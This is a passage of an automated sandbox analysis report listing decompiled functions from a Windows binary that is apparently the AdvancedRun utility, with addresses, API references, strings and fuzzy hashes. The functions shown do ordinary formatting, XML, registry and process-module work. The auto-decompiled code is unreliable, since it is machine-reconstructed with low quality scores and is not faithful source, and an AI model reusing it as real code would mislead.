                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                0x00404fe0
                                                                                                                0x00404fe9
                                                                                                                0x00405000
                                                                                                                0x00405005
                                                                                                                0x00405009
                                                                                                                0x0040500c
                                                                                                                0x0040500e
                                                                                                                0x00405015
                                                                                                                0x00405016
                                                                                                                0x00405021
                                                                                                                0x00405026
                                                                                                                0x00405027
                                                                                                                0x0040502c
                                                                                                                0x00405031
                                                                                                                0x00405039
                                                                                                                0x0040503f
                                                                                                                0x00405044
                                                                                                                0x00405048
                                                                                                                0x0040504e
                                                                                                                0x00405056
                                                                                                                0x0040505c
                                                                                                                0x0040504e
                                                                                                                0x00405065
                                                                                                                0x0040506a
                                                                                                                0x00405072
                                                                                                                0x00405079

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                0x00407d9c
                                                                                                                0x00407d9e
                                                                                                                0x00407da5
                                                                                                                0x00407db3
                                                                                                                0x00407dba
                                                                                                                0x00407dc5
                                                                                                                0x00407dc7
                                                                                                                0x00407dd0
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dd8
                                                                                                                0x00407de1
                                                                                                                0x00407de5
                                                                                                                0x00407deb
                                                                                                                0x00407df2
                                                                                                                0x00407df3
                                                                                                                0x00407dfe
                                                                                                                0x00407e03
                                                                                                                0x00407e04
                                                                                                                0x00407e21

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                0x00403b56
                                                                                                                0x00403b5d
                                                                                                                0x00403b6f
                                                                                                                0x00403b76
                                                                                                                0x00403b82
                                                                                                                0x00403b8d
                                                                                                                0x00403b8e
                                                                                                                0x00403b99
                                                                                                                0x00403b9e
                                                                                                                0x00403b9f
                                                                                                                0x00403ba7
                                                                                                                0x00403bb9
                                                                                                                0x00403bce
                                                                                                                0x00403be5
                                                                                                                0x00403bef
                                                                                                                0x00403bf8
                                                                                                                0x00403c00

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                0x0040afd3
                                                                                                                0x0040afe2
                                                                                                                0x0040aff3
                                                                                                                0x0040b002
                                                                                                                0x0040b023
                                                                                                                0x00000000
                                                                                                                0x0040b047
                                                                                                                0x0040b02e
                                                                                                                0x0040b034
                                                                                                                0x0040b03c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 38%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}


























                                                                                                                0x004092f3
                                                                                                                0x004092fb
                                                                                                                0x00409303
                                                                                                                0x00409305
                                                                                                                0x00409310
                                                                                                                0x00409433
                                                                                                                0x00409433
                                                                                                                0x00409439
                                                                                                                0x0040943f
                                                                                                                0x00409445
                                                                                                                0x0040944b
                                                                                                                0x0040944e
                                                                                                                0x00409452
                                                                                                                0x00409466
                                                                                                                0x0040946e
                                                                                                                0x00409475
                                                                                                                0x004094f7
                                                                                                                0x004094f7
                                                                                                                0x004094f9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409488
                                                                                                                0x00409494
                                                                                                                0x004094a5
                                                                                                                0x004094a9
                                                                                                                0x004094b5
                                                                                                                0x004094c3
                                                                                                                0x004094c6
                                                                                                                0x004094d5
                                                                                                                0x004094dc
                                                                                                                0x004094e1
                                                                                                                0x004094e3
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094e3
                                                                                                                0x00000000
                                                                                                                0x004094f7
                                                                                                                0x00409452
                                                                                                                0x00409316
                                                                                                                0x00409316
                                                                                                                0x0040931c
                                                                                                                0x00000000
                                                                                                                0x00409322
                                                                                                                0x0040932b
                                                                                                                0x00409333
                                                                                                                0x00409337
                                                                                                                0x00409341
                                                                                                                0x00409342
                                                                                                                0x0040934e
                                                                                                                0x0040934f
                                                                                                                0x00409358
                                                                                                                0x0040935e
                                                                                                                0x0040935e
                                                                                                                0x00409363
                                                                                                                0x0040936b
                                                                                                                0x0040936d
                                                                                                                0x00409377
                                                                                                                0x00409385
                                                                                                                0x0040938d
                                                                                                                0x0040939d
                                                                                                                0x004093a5
                                                                                                                0x004093ac
                                                                                                                0x004093b4
                                                                                                                0x004093c5
                                                                                                                0x004093c9
                                                                                                                0x004093da
                                                                                                                0x004093df
                                                                                                                0x004093e5
                                                                                                                0x004093e6
                                                                                                                0x004093ea
                                                                                                                0x004093f6
                                                                                                                0x004093fc
                                                                                                                0x00409407
                                                                                                                0x00409407
                                                                                                                0x0040941d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409423
                                                                                                                0x00409428
                                                                                                                0x00409375
                                                                                                                0x00409375
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040942e
                                                                                                                0x00000000
                                                                                                                0x00409428
                                                                                                                0x00409377
                                                                                                                0x0040936d
                                                                                                                0x004094fb
                                                                                                                0x004094ff
                                                                                                                0x004094ff
                                                                                                                0x00409337
                                                                                                                0x0040931c
                                                                                                                0x0040950f

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                0x00402ed7
                                                                                                                0x00402eee
                                                                                                                0x00402ef8
                                                                                                                0x00402f00
                                                                                                                0x00402f01
                                                                                                                0x00402f05
                                                                                                                0x00402f0a
                                                                                                                0x00402f1a
                                                                                                                0x00402f30

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                0x004079a4
                                                                                                                0x004079b8
                                                                                                                0x004079bd
                                                                                                                0x004079c2
                                                                                                                0x004079c5
                                                                                                                0x004079c5
                                                                                                                0x004079db
                                                                                                                0x004079f7
                                                                                                                0x00407a06
                                                                                                                0x00407a0c
                                                                                                                0x00407a11
                                                                                                                0x00407a13
                                                                                                                0x00407a14
                                                                                                                0x00407a17
                                                                                                                0x00407a18
                                                                                                                0x00407a1d
                                                                                                                0x00407a22
                                                                                                                0x00407a25
                                                                                                                0x00407a2a
                                                                                                                0x00407a35
                                                                                                                0x00407a3a
                                                                                                                0x00407a3b
                                                                                                                0x00407a40
                                                                                                                0x00407a52

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004079DB
                                                                                                                  • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                • API String ID: 1775345501-2769808009
                                                                                                                • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                                • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                                • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                                0x00404683
                                                                                                                0x00404692
                                                                                                                0x00404699
                                                                                                                0x0040469b
                                                                                                                0x004046af
                                                                                                                0x004046ba
                                                                                                                0x004046bc
                                                                                                                0x004046c7
                                                                                                                0x004046cc
                                                                                                                0x004046cd
                                                                                                                0x004046ee
                                                                                                                0x004046f3
                                                                                                                0x004046fa
                                                                                                                0x004046fa
                                                                                                                0x004046ee
